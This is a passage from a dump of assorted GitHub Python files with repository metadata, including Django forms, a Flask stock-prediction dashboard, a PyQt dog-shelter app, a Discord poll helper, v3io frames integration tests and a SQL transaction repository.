}","repo_name":"Daniel-Karanja/Enemy-Of-Syntax-Learn-Django","sub_path":"FILES/files/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4558638846","text":"import numpy as np\nimport mfd\nfrom matplotlib import pyplot as pl\n\nn = 30\nxr = np.linspace(0, 2*1.5, int(n*1.5))\nyr = np.linspace(0, 2, n)\nx, y = np.meshgrid(xr, yr)\nz = np.exp(-x*x-y*y)\nw = abs(xr[0]-xr[1])\na = mfd.sca(z, w)\nb = np.load('data.npy')\npl.pcolormesh(x, y, (a-b)/a)\npl.colorbar()\nax = pl.gca()\nax.set_aspect('equal')\npl.show()\n","repo_name":"UP-RS-ESP/GEW-DAP05-2018","sub_path":"Session_07/mfdrouting/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"17960713721","text":"from django import forms\nfrom .models import Dish\n\n\nclass DishForm(forms.ModelForm):\n\n class Meta:\n model = Dish\n fields = '__all__'\n labels = {'name': 'Name of Dish'}\n field_classes = {\n 'chefs': forms.ModelMultipleChoiceField,\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['recipe'].required = False\n self.fields['ingredients'].required = False\n","repo_name":"DS-dsn1/Django_restaurant","sub_path":"restaurant/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33321162398","text":"#extra_life.py\n\nimport collidable, util, pyglet, aabb\n\npyglet.resource.path.append('./images')\npyglet.resource.reindex()\n\npwrup_image=pyglet.resource.image('explosion.png')\nutil.center_image(pwrup_image)\n\n\nclass Extra_life(collidable.Collidable):\n \n def __init__(self, *args, **kwargs):\n super(Extra_life,self).__init__(pwrup_image,*args,**kwargs)\n self.scale=0.3\n self.is_pwrup=True\n \n self.lower_bound=((self.x-self.width//2),(self.y-self.height//2))\n self.upper_bound=((self.x+self.width//2),(self.y+self.height//2))\n self.bounding_box=aabb.AABB(self.lower_bound,self.upper_bound)\n\n def update(self,dt):\n pass\n\n def update_bounding_box(self):\n self.lower_bound=((self.x-self.width//2),(self.y-self.height//2))\n self.upper_bound=((self.x+self.width//2),(self.y+self.height//2))\n self.bounding_box=aabb.AABB(self.lower_bound,self.upper_bound)\n \n def handle_collision_with(self,other):\n\n if other.is_avatar:\n self.dead=True\n \n","repo_name":"AgnesIrwin/Template-B","sub_path":"game/extra_life.py","file_name":"extra_life.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16915831639","text":"import json\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport logging\n\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nimport plotly\n\nfrom data_retriever.retriever import get_daily_historical\nfrom utils.plot_factory import plot_historical_with_predicted_data\nimport utils.defaults as defaults\nfrom utils.data_elaboration import prepare_data, clean_data\nfrom utils.modelling import load_model\n\n\napp = Flask(__name__)\nlogger = logging.getLogger(__name__)\n\n# index webpage displays cool visuals\n@app.route('/')\n@app.route('/index')\ndef index():\n\n figures = list()\n\n # start_date = datetime.datetime(2016, 1, 1)\n # end_date = datetime.datetime(2020, 8, 31)\n end_date = datetime.datetime.now()\n extra_days = max(defaults.PREDICTION_HORIZONS) + defaults.EXTRA_DATA_PERIODS\n start_date = end_date - datetime.timedelta(days=defaults.DASHBOARD_DATA_WINDOW_DAYS + extra_days)\n\n regression_results = dict()\n for horizon in defaults.PREDICTION_HORIZONS:\n regression_results[f\"regression_result_{horizon}d\"] = dict()\n\n for symbol in defaults.SYMBOLS.keys():\n\n logger.info(f\"Performing regression for symbol: {symbol}\")\n model = load_model(f\"../models/production_models/models_{symbol}.dump\")\n\n # get OHLCV data\n data = get_daily_historical(symbol, start_date, end_date)\n\n data = clean_data(data)\n regression_input, _ = prepare_data(data.copy(), delays=defaults.PREDICTION_HORIZONS)\n regression_input = regression_input[-1, :].reshape(1, -1)\n\n # compute predictions\n regression_outputs = model.predict(regression_input)[-1]\n\n current_price = data['Adj Close'].iloc[-1]\n regression_pct_returns = 100 * (regression_outputs - current_price) / current_price\n regression_pct_returns = np.round(regression_pct_returns, decimals=2)\n\n # create dataframe for predicted data, first data-value current Adj. price\n predicted_data = pd.DataFrame(index=[data.index[-1]],\n data=[[data.iloc[-1]['Adj Close']] * 4],\n columns=[f\"Adj Close - {horizon}d_prediction\" for horizon in defaults.PREDICTION_HORIZONS])\n\n for count, horizon in enumerate(defaults.PREDICTION_HORIZONS):\n regression_results[f\"regression_result_{horizon}d\"].update({symbol: regression_pct_returns[count]})\n\n # append 1day prediction\n predicted_data = predicted_data.append(pd.DataFrame(index=[data.index[-1] + pd.Timedelta(days=horizon)],\n data=[regression_outputs[count]],\n columns=[f\"Adj Close - {horizon}d_prediction\"]))\n\n # plot data\n fig = plot_historical_with_predicted_data(symbol, data, predicted_data, return_fig=True)\n figures.append(fig)\n\n # encode plotly graphs in JSON\n ids = ['figure-{}'.format(i) for i, _ in enumerate(figures)]\n # Convert the plotly figures to JSON for javascript in html template\n figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('index.html',\n ids=ids,\n figuresJSON=figuresJSON,\n **regression_results)\n\n\ndef main():\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"marc0f/UDACITY_DSND_5-Investment_and_Trading_Capstone_Project","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18007030226","text":"\"\"\" It returns the coordinates of a given direction.\n Example: FRONT -> -1,0\n LEFT -> 0,-1\n\"\"\"\nfrom Constants import *\n\nmap_direction_coordinates = {\n 0: [-1,0],\n 1: [0, 1],\n 2: [1, 0],\n 3: [0,-1]\n}\n\nopposite_directions = {\n LEFT: RIGHT,\n RIGHT: LEFT,\n FRONT: BACK,\n BACK: FRONT\n}\n\n\"\"\" This is used to obtain the orthogonal directions for a given direction.\n Examples: FRONT -> orthogonals are [LEFT, RIGHT]\n RIGHT -> orthogonals are [FRONT, DOWN]\n\"\"\"\northogonal_directions = {\n 0: [[0,-1, LEFT],[0,1, RIGHT]], # ↑: (←,→)\n 1: [[-1,0, FRONT],[1,0, BACK]], # →: (↑,↓)\n 2: [[0,1, RIGHT],[0,-1, LEFT]], # ↓: (←,→)\n 3: [[-1,0, FRONT],[1,0, BACK]] # ←: (↑,↓)\n}\n\n\"\"\" It returns the coordinates of a given direction.\n Example: FRONT -> -1,0\n LEFT -> 0,-1\n\"\"\"\nmap_direction_coordinates = {\n 0: [-1,0],\n 1: [0, 1],\n 2: [1, 0],\n 3: [0, -1]\n}","repo_name":"jcrecio/s_traffic","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16162483608","text":"import sqlite3\r\n\r\nfrom PyQt5.QtWidgets import QMainWindow\r\n\r\nfrom designers.choose_window_designer import Ui_SecondWindow\r\nfrom windows.result_window import ResultWindow\r\nfrom PyQt5.QtGui import QPixmap\r\n\r\n\r\nclass SecondWidget(QMainWindow, Ui_SecondWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.setWindowTitle(\"choose\")\r\n self.btn_back_to_main_menu.clicked.connect(self.back_to_main_menu)\r\n self.btn_choose.clicked.connect(self.choose)\r\n self.btn_next.clicked.connect(self.next)\r\n self.dog_number = 1 # изменение номера собаки на 1, то есть теперь\r\n # это номер второй собаки, тк первую мы вывели еще до перехода в это окно\r\n\r\n def back_to_main_menu(self):\r\n self.hide()\r\n\r\n def next(self):\r\n if len(self.selected_dogs_file_names) == 1: # Изменение значения номера собаки на 0\r\n self.dog_number = 0 # если есть всего одна подходящая собака\r\n self.pixmap = QPixmap(f\"images\\{self.selected_dogs_file_names[self.dog_number][0]}.png\")\r\n # отображение следующей из подходящих собак, если есть всего одна такая собака,\r\n # то выводится та же картинка\r\n self.image_lbl.setPixmap(self.pixmap)\r\n self.dog_number_now = self.dog_number # текущий номер собаки\r\n self.dog_number += 1\r\n\r\n if self.dog_number > len(self.selected_dogs_file_names) - 1: # перезапуск очереди\r\n self.dog_number = 0 # из подходящих собак\r\n\r\n def choose(self):\r\n con = sqlite3.connect(\"dog_shelter_db\")\r\n cur = con.cursor()\r\n cur.execute(\"\"\"UPDATE dogs\r\n SET is_taken = \"yes\"\r\n WHERE dog_image_file_name == :dog_filename\r\n \"\"\", {'dog_filename': self.selected_dogs_file_names[self.dog_number_now][0]})\r\n con.commit()\r\n con.close()\r\n\r\n self.res = ResultWindow()\r\n self.hide()\r\n self.res.show()\r\n","repo_name":"dimondg/dog_shelter","sub_path":"windows/choose_window.py","file_name":"choose_window.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37342521597","text":"import json\nfrom tqdm import tqdm\nimport random\n\ncategory_id = 1 # 1:visible body 2:full body 3:head 4:vehicle\njson_path = \"/root/data/gvision/dataset/train/ruby_output/dyy_split_visiblebody.json\"\nodgt_path = \"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_tvp_fusion.odgt\"\nodgt_train_append_path = \"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_train.odgt\"\nodgt_test_append_path = \"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_val.odgt\"\ndef coco2crowdhuman(odgt_path,json_path,odgt_train_append_path,odgt_test_append_path):\n with open(json_path, 'r') as load_f:\n json_dict = json.load(load_f)\n images = json_dict[\"images\"]\n annos = json_dict[\"annotations\"]\n odgt = list()\n pbar = tqdm(total=len(images), ncols=50)\n for image in images:\n odgt_one = dict()\n odgt_one[\"ID\"] = image[\"file_name\"][0:-4]\n image_id = image[\"id\"]\n gtboxes = list()\n box_id = 0\n for anno in annos:\n if anno[\"image_id\"] == image_id and anno[\"category_id\"] == category_id:\n gtbox = dict()\n\n gtbox[\"tag\"] = \"person\"\n gtbox[\"hbox\"] = [0, 0, 0, 0]\n gtbox[\"head_attr\"] = {\"ignore\": 0, \"occ\": 1, \"unsure\": 0}\n\n # visible body\n gtbox[\"fbox\"] = [0, 0, 0, 0]\n gtbox[\"vbox\"] = anno[\"bbox\"]\n\n # full body\n # gtbox[\"fbox\"] = anno[\"bbox\"]\n # gtbox[\"vbox\"] = [0, 0, 0, 0]\n\n extra = dict()\n extra[\"box_id\"] = box_id\n box_id += 1\n extra[\"occ\"] = 1\n gtbox[\"extra\"] = extra\n\n gtboxes.append(gtbox)\n\n odgt_one[\"gtboxes\"] = gtboxes\n odgt.append(odgt_one)\n pbar.update(1)\n pbar.close()\n odgtvp=odgt\n odgttp=odgt\n\n with open(odgt_train_append_path, 'r') as load_f:\n for line in load_f.readlines():\n odgt.append(line[0:-1])\n odgttp.append(line[0:-1])\n\n with open(odgt_test_append_path, 'r') as load_f:\n for line in load_f.readlines():\n odgt.append(line[0:-1])\n odgtvp.append(line[0:-1])\n\n print(odgt[1])\n random.shuffle(odgt)\n print(odgt[1])\n random.shuffle(odgtvp)\n random.shuffle(odgttp)\n\n\n\n with open(odgt_path, \"w\") as f:\n for line in odgt:\n f.write(str(line) + '\\n')\n \n with open(\"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_vp_fusion.odgt\", \"w\") as f:\n for line in odgtvp:\n f.write(str(line) + '\\n')\n \n with open(\"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_tp_fusion.odgt\", \"w\") as f:\n for line in odgttp:\n f.write(str(line) + '\\n')\n\ncoco2crowdhuman(odgt_path,json_path,odgt_train_append_path,odgt_test_append_path)","repo_name":"Harzva/gigavision","sub_path":"my_tools/2odgt.py","file_name":"2odgt.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"27646930299","text":"import asyncio\nfrom enum import Enum\n\nimport discord\n\nimport src.config as config\nfrom src.discord.helpers import KnownGuild\nfrom src.discord.helpers.waiters import MemberWaiter\n\n\nclass SimpleVote:\n class Option(Enum):\n yes = \"✅\"\n no = \"❎\"\n skip = \"❓\"\n\n __slots__ = (\"option\", \"count\")\n\n def __init__(self, option: Option, count: int = 0):\n self.option = option\n self.count = count\n\n def increment_count(self):\n self.count += 1\n\n\nclass SimplePoll:\n \"\"\"A simple event based vote, wont be 'finished' until every member in the channel reacted.\"\"\"\n\n @classmethod\n def add_guild_data(cls, guild_id: int, vote_channel_id: int, result_channel_id: int):\n cls.guild_data[guild_id] = {\"vote_channel\": vote_channel_id, \"result_channel\": result_channel_id}\n\n options = [x.value for x in SimpleVote.Option]\n\n guild_data = {}\n\n __slots__ = (\"message\", \"question\", \"votes\", \"member_count\")\n\n def __init__(self, message: discord.Message, votes: list, member_count: int):\n self.message = message\n self.question = message.content\n self.votes = votes\n self.member_count = member_count\n\n @classmethod\n async def from_payload(cls, payload) -> \"SimplePoll\":\n channel = config.bot.get_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n votes = await cls.get_votes(message)\n member_count = len([x for x in message.channel.members if not cls.should_skip_member(x)])\n\n return cls(message, votes, member_count)\n\n @classmethod\n def is_eligible(cls, payload) -> bool:\n if payload.member is None or payload.member.bot:\n return False\n if str(payload.emoji) not in cls.options:\n return False\n if payload.guild_id is None:\n return False\n\n channel_data = cls.guild_data.get(payload.guild_id)\n if channel_data is None:\n return False\n if payload.channel_id != channel_data[\"vote_channel\"]:\n return False\n\n return True\n\n @classmethod\n async def get_votes(cls, message: discord.Message) -> list:\n reactions = [x for x in message.reactions if str(x.emoji) in cls.options]\n all_user_ids = set()\n votes = []\n for reaction in reactions:\n vote = SimpleVote(SimpleVote.Option(str(reaction.emoji)))\n votes.append(vote)\n\n async for user in reaction.users():\n if cls.should_skip_member(user) or user.id in all_user_ids:\n continue\n vote.increment_count()\n all_user_ids.add(user.id)\n\n return votes\n\n @classmethod\n def should_skip_member(cls, member: discord.Member) -> bool:\n should_skip = member.bot\n\n if member.guild.id == KnownGuild.intergalactica and member.id == 120566758091259906:\n should_skip = True\n\n return should_skip\n\n def should_finish(self) -> bool:\n total_votes = sum(x.count for x in self.votes)\n return total_votes >= self.member_count\n\n def is_selfie_vote(self):\n if self.message.guild.id != KnownGuild.intergalactica:\n return False\n return \"selfie access\" in self.message.content.lower() or \"selfie perm\" in self.message.content.lower()\n\n def assign_selfie_role(self):\n user_id = MemberWaiter.get_id(self.message.content)\n member = self.message.guild.get_member(user_id)\n if member is None:\n return False\n selfie_role = self.message.guild.get_role(748566253534445568)\n if selfie_role is None:\n return False\n\n asyncio.gather(member.add_roles(selfie_role))\n return True\n\n def finish(self):\n channel = self.message.guild.get_channel(self.guild_data[self.message.guild.id][\"result_channel\"])\n embed = discord.Embed(color=config.bot.get_dominant_color(None))\n\n lines = []\n lines.append(self.question)\n lines.append(\"*(all members finished voting)*\")\n lines.append(\"\\n\")\n\n skip_count = sum(x.count for x in self.votes if x.option == SimpleVote.Option.skip)\n valid_vote_count = self.member_count - skip_count\n\n for vote in self.votes:\n if vote.option == SimpleVote.Option.skip:\n continue\n\n try:\n percentage = (vote.count / valid_vote_count) * 100\n percentage = int(percentage) if percentage % 1 == 0 else percentage\n except ZeroDivisionError:\n percentage = 0\n\n lines.append(f\"{vote.option.value}: {vote.count} **{percentage}%**\")\n\n if vote.option == SimpleVote.Option.yes and percentage == 100:\n if self.is_selfie_vote():\n if self.assign_selfie_role():\n embed.set_footer(text=\"Selfie role assigned.\")\n\n embed.description = \"\\n\".join(lines)\n asyncio.gather(channel.send(embed=embed))\n","repo_name":"claderoki/Intergalactica-Discord-Bot","sub_path":"src/discord/cogs/custom/shared/helpers/simple_poll.py","file_name":"simple_poll.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1698528645","text":"# рекурсивные функции\n\ndef factorial(n) :\n if n != 0 :\n return n * factorial(n-1)\n return 1\nprint(factorial(5))\n\ndef func(x) : return x\n\na1 = func # присваиваем функции несколько переменных\na2 = a1\nprint(a1(5))\nprint(a2(3))\nprint(func(10))\n\n","repo_name":"bazin1984/Lessons","sub_path":"lesson12_functions/Task12.11.py","file_name":"Task12.11.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73301064410","text":"\"\"\"\n\"Minha mãe mandou\" é uma das primeiras brincadeiras que crianças \naprendem no Brasil. É uma maneira fácil de definir qual comida será \nescolhida entre as muitas alternativas colocadas no prato do almoço.\n\nMariazinha aprendeu uma versão diferente dessa brincadeira com sua mãe. \nPara fazer sua escolha ela deve repetir K vezes a frase \n\"MI-NHA-MÃE-MAN-DOU-EU-ES-CO-LHER-ES-TE-DA-QUI-MAS-CO-MO-EU-SOU-TEI-MO-\nSA-EU-ES-CO-LHO-ES-TE-DA-QUI\" e para cada sílaba (são 29 sílabas) muda \nda escolha da comida de maneira circular começando no alimento 1, indo \naté o alimento N e retornando ao 1 até esgotar as sílabas das K repetições\nda frase da brincadeira. No prato tem N alimentos diferentes.\n\"\"\"\n\n\nimport math\n\nqtdcasos = int(input())\n\nwhile qtdcasos:\n qtdalimentos, qtdrepeticao = input().split()\n\n qtdalimentos = int(qtdalimentos)\n qtdrepeticao = int(qtdrepeticao)\n\n silabas = qtdrepeticao * 29\n\n alimento1 = silabas / qtdalimentos\n\n alimento1 = math.ceil(alimento1)\n\n alimentoescolhido = silabas % qtdalimentos\n\n alimentoescolhido += 1\n\n print(alimento1, alimentoescolhido)\n\n qtdcasos -= 1\n","repo_name":"GuilhermRodovalho/Algoritmos-e-estruturas-de-dados","sub_path":"programaçao-dinamica/01-minha_mae_mandou.py","file_name":"01-minha_mae_mandou.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35121988468","text":"from time import sleep\nfrom uuid import uuid4\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport v3io_frames as v3f\nfrom datetime import datetime\nimport pytz\nfrom conftest import has_go, test_backends, protocols, has_session\n\ntsdb_span = 5 # hours\ninteg_params = [(p, b) for p in protocols for b in test_backends]\n\n\ndef csv_df(size):\n data = {\n 'icol': np.random.randint(-17, 99, size),\n 'fcol': np.random.rand(size),\n 'scol': ['val-{}'.format(i) for i in range(size)],\n 'bcol': np.random.choice([True, False], size=size),\n 'tcol': pd.date_range('2018-01-01', '2018-10-10', periods=size),\n }\n\n return pd.DataFrame(data)\n\n\ndef kv_df(size):\n index = ['mike', 'joe', 'jim', 'rose', 'emily', 'dan']\n columns = ['n1', 'n2', 'n3']\n data = np.random.randn(len(index), len(columns))\n return pd.DataFrame(data, index=index, columns=columns)\n\n\ndef stream_df(size):\n end = pd.Timestamp.utcnow().replace(minute=0, second=0, microsecond=0)\n index = pd.date_range(end=end, periods=60, freq='300s')\n columns = ['cpu', 'mem', 'disk']\n data = np.random.randn(len(index), len(columns))\n return pd.DataFrame(data, index=index, columns=columns)\n\n\ndef tsdb_df(size):\n return stream_df(size)\n\n\n# Backend specific configuration. None means don't run this step\ntest_config = {\n 'csv': {\n 'df_fn': csv_df,\n 'execute': {\n 'command': 'ping',\n },\n },\n 'kv': {\n 'df_fn': kv_df,\n 'create': None,\n 'execute': None,\n },\n 'stream': {\n 'df_fn': stream_df,\n 'create': {\n 'retention_hours': 48,\n 'shards': 1,\n },\n 'read': {\n 'seek': 'earliest',\n 'shard_id': '0',\n },\n 'execute': None,\n },\n 'tsdb': {\n 'df_fn': tsdb_df,\n 'create': {\n 'rate': '1/m',\n },\n 'read': {\n 'step': '10m',\n 'aggregators': 'avg,max,count',\n 'start': 'now-{}h'.format(tsdb_span),\n 'end': 'now',\n },\n 'execute': None,\n },\n}\n\nschema = v3f.Schema(\n type='type',\n namespace='namesapce',\n name='name',\n doc='doc',\n fields=[\n v3f.SchemaField('field1', '', '', 't1', None),\n v3f.SchemaField('field2', '', '', 't2', None),\n v3f.SchemaField('field3', '', '', 't3', None),\n ],\n)\n\n\n@pytest.mark.parametrize('protocol,backend', integ_params)\ndef test_integration(framesd, session, protocol, backend):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n test_id = uuid4().hex\n size = 293\n table = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n cfg = test_config.get(backend, {})\n df = cfg['df_fn'](size)\n\n create_kw = cfg.get('create', {})\n if create_kw is not None:\n client.create(backend, table, **create_kw)\n\n write_kw = cfg.get('write', {})\n\n labels = {}\n if backend == 'tsdb':\n labels = {\n 'li': 17,\n 'lf': 3.22,\n 'ls': 'hi',\n }\n\n client.write(backend, table, [df], **write_kw, labels=labels)\n sleep(1) # Let db flush\n\n read_kw = cfg.get('read', {})\n dfs = list(client.read(backend, table=table, iterator=True, **read_kw))\n df2 = pd.concat(dfs)\n\n if backend == 'tsdb':\n compare_dfs_tsdb(df, df2, backend)\n elif backend == 'stream':\n compare_dfs_stream(df, df2, backend)\n else:\n if backend == 'kv':\n # FIXME: Probably the schema\n df2.dropna(inplace=True)\n compare_dfs(df, df2, backend)\n\n df = client.read(backend, table=table, **read_kw)\n assert isinstance(df, pd.DataFrame), 'iterator=False returned generator'\n\n client.delete(backend, table)\n exec_kw = cfg.get('execute', {})\n if exec_kw is not None:\n client.execute(backend, table, **exec_kw)\n\n\ndef compare_dfs(df1, df2, backend):\n assert set(df2.columns) == set(df1.columns), \\\n '{}: columns mismatch'.format(backend)\n for name in df1.columns:\n if name == 'tcol':\n # FIXME: Time zones\n continue\n col1 = df1[name].sort_index()\n col2 = df2[name].sort_index()\n assert len(col1) == len(col2), \\\n '{}: column {} size mismatch'.format(backend, name)\n if col1.dtype == float:\n ok = np.allclose(col1.values, col2.values)\n else:\n ok = col1.equals(col2)\n assert ok, '{}: column {} mismatch'.format(backend, name)\n\n\ndef compare_dfs_stream(df1, df2, backend):\n assert set(df1.columns) < set(df2.columns), 'bad columns'\n\n\ndef compare_dfs_tsdb(df1, df2, backend):\n # TODO\n pass\n\n\ndef test_integration_http_error(framesd):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n c = v3f.HTTPClient(framesd.http_addr, session=None)\n\n with pytest.raises(v3f.ReadError):\n for df in c.read('no-such-backend', table='no such table'):\n pass\n\n\n@pytest.mark.parametrize('protocol', protocols)\ndef test_kv_read_empty_df(framesd, session, protocol):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n if not has_session:\n raise AssertionError(\"No session found\")\n\n backend = 'kv'\n test_id = uuid4().hex\n tableName = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n\n index = [str(i) for i in range(1, 4)]\n df = pd.DataFrame(data={'col1': [i for i in range(1, 4)], 'col2': ['aaa', 'bad', 'cffd']}, index=index)\n client.write(backend, table=tableName, dfs=df, condition=\"starts({col2}, 'aaa') AND {col1} == 3\")\n\n df = client.read(backend, table=tableName)\n assert df.to_json() == '{}'\n assert isinstance(df, pd.DataFrame), 'iterator=False returned generator'\n\n client.delete(backend, tableName)\n\n\n@pytest.mark.parametrize('protocol', protocols)\ndef test_datetime(framesd, session, protocol):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n if not has_session:\n raise AssertionError(\"No session found\")\n\n backend = 'kv'\n test_id = uuid4().hex\n tableName = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n\n col = pd.Series([datetime.now(pytz.timezone(\"Africa/Abidjan\")), datetime.now(pytz.timezone(\"America/Nassau\")), None, datetime.now()])\n df = pd.DataFrame({'col': col})\n client.write(backend, table=tableName, dfs=df)\n\n df = client.read(backend, table=tableName)\n\n client.delete(backend, tableName)\n\n\n@pytest.mark.parametrize('protocol', protocols)\ndef test_timestamp(framesd, session, protocol):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n if not has_session:\n raise AssertionError(\"No session found\")\n\n backend = 'kv'\n test_id = uuid4().hex\n tableName = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n\n df = pd.DataFrame({'birthday': [pd.Timestamp('1940-04-25', tz='Asia/Dubai'), pd.Timestamp('1940-04-25', tz='US/Pacific'), None, pd.Timestamp('1940-04-25')]})\n client.write(backend, table=tableName, dfs=df)\n\n df = client.read(backend, table=tableName)\n\n client.delete(backend, tableName)\n","repo_name":"v3io/frames","sub_path":"clients/py/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"32"} +{"seq_id":"13793502934","text":"from IPython.display import Image\r\nfrom sklearn import tree\r\nimport pydotplus\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import datasets\r\nimport matplotlib.pyplot as plt\r\n\r\niris = datasets.load_iris()\r\nfeatures = iris['data']\r\ntarget = iris['target']\r\n\r\ndecisiontree = DecisionTreeClassifier(random_state=0, max_depth=None,\r\n min_samples_split=2, min_samples_leaf=1,\r\n min_weight_fraction_leaf=0,\r\n max_leaf_nodes=None,\r\n min_impurity_decrease=0)\r\n\r\n\r\n# mentraining model>\r\nmodel = decisiontree.fit(features, target)\r\n\r\n# mengambil sempel oberasiv dan membuat prediksi\r\n# sempel berupa data dimensi kelompok\r\n# fungsi predic() => memriksa kelas yang dimiliki\r\n# fungsi predic_promba > memeriksa probabilitas kelas dari prediksi\r\nobservation = [[5, 4, 3, 2]]\r\nmodel.predict(observation)\r\nmodel.predict_proba(observation)\r\n\r\n# membuat grafik visualisasi DT\r\ndot_data = tree.export_graphviz(decisiontree, out_file=None,\r\n feature_names=iris['feature_names'],\r\n class_names=iris['target_names'])\r\ngraph = pydotplus.graph_from_dot_data(dot_data)\r\nImage(graph.create_png())\r\ngraph.write_png('iris.png')\r\n","repo_name":"yudhapest/Python","sub_path":"Data-Mining/Decision Tree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2495330853","text":"# Code you have previously used to load data\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\n\n\n# Path of the file to read\niowa_file_path = '../input/home-data-for-ml-course/train.csv'\n\nhome_data = pd.read_csv(iowa_file_path)\n# Create target object and call it y\ny = home_data.SalePrice\n# Create X\nfeatures = ['LotArea', 'YearBuilt', '1stFlrSF', '2ndFlrSF', 'FullBath', 'BedroomAbvGr', 'TotRmsAbvGrd']\nX = home_data[features]\n\n# Split into validation and training data\ntrain_X, val_X, train_y, val_y = train_test_split(X, y, random_state=1)\n\n# Specify Model\niowa_model = DecisionTreeRegressor(random_state=1)\n# Fit Model\niowa_model.fit(train_X, train_y)\n\n# Make validation predictions and calculate mean absolute error\nval_predictions = iowa_model.predict(val_X)\nval_mae = mean_absolute_error(val_predictions, val_y)\nprint(\"Validation MAE when not specifying max_leaf_nodes: {:,.0f}\".format(val_mae))\n\n# Using best value for max_leaf_nodes\niowa_model = DecisionTreeRegressor(max_leaf_nodes=100, random_state=1)\niowa_model.fit(train_X, train_y)\nval_predictions = iowa_model.predict(val_X)\nval_mae = mean_absolute_error(val_predictions, val_y)\nprint(\"Validation MAE for best value of max_leaf_nodes: {:,.0f}\".format(val_mae))\n\n\n# Set up code checking\nfrom learntools.core import binder\nbinder.bind(globals())\nfrom learntools.machine_learning.ex6 import *\nprint(\"\\nSetup complete\")","repo_name":"gagandeepahuja09/tech_articles","sub_path":"ml_basics/intro_ml_kaggle/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"24280938592","text":"from pdb import run\nfrom db.run_sql import run_sql\nfrom operator import attrgetter\nfrom models.transaction import Transaction\nimport repositories.tag_repository as tag_repository\nimport repositories.merchant_repository as merchant_repository\n\ndef save(transaction):\n sql = \"INSERT INTO transactions (amount, tag_id, merchant_id, date) VALUES (%s, %s, %s, %s) RETURNING id\"\n values = [transaction.amount, transaction.tag.id, transaction.merchant.id, transaction.date]\n results = run_sql(sql, values)\n id = results[0]['id']\n transaction.id = id\n return transaction\n\ndef delete_all():\n sql = \"DELETE FROM transactions\"\n\ndef delete(id):\n sql = \"DELETE FROM transactions WHERE id = %s\"\n values = [id]\n run_sql(sql, values)\n\ndef update(transaction):\n sql = \"UPDATE transactions SET (amount, tag_id, merchant_id, date) = (%s, %s, %s, %s) WHERE id = %s\"\n values = [transaction.amount, transaction.tag.id, transaction.merchant.id, transaction.date, transaction.id]\n run_sql(sql, values)\n\ndef select(id):\n transaction = None\n sql = \"SELECT * FROM transactions WHERE id = %s\"\n values = [id]\n result = run_sql(sql, values)[0]\n\n if result is not None:\n tag = 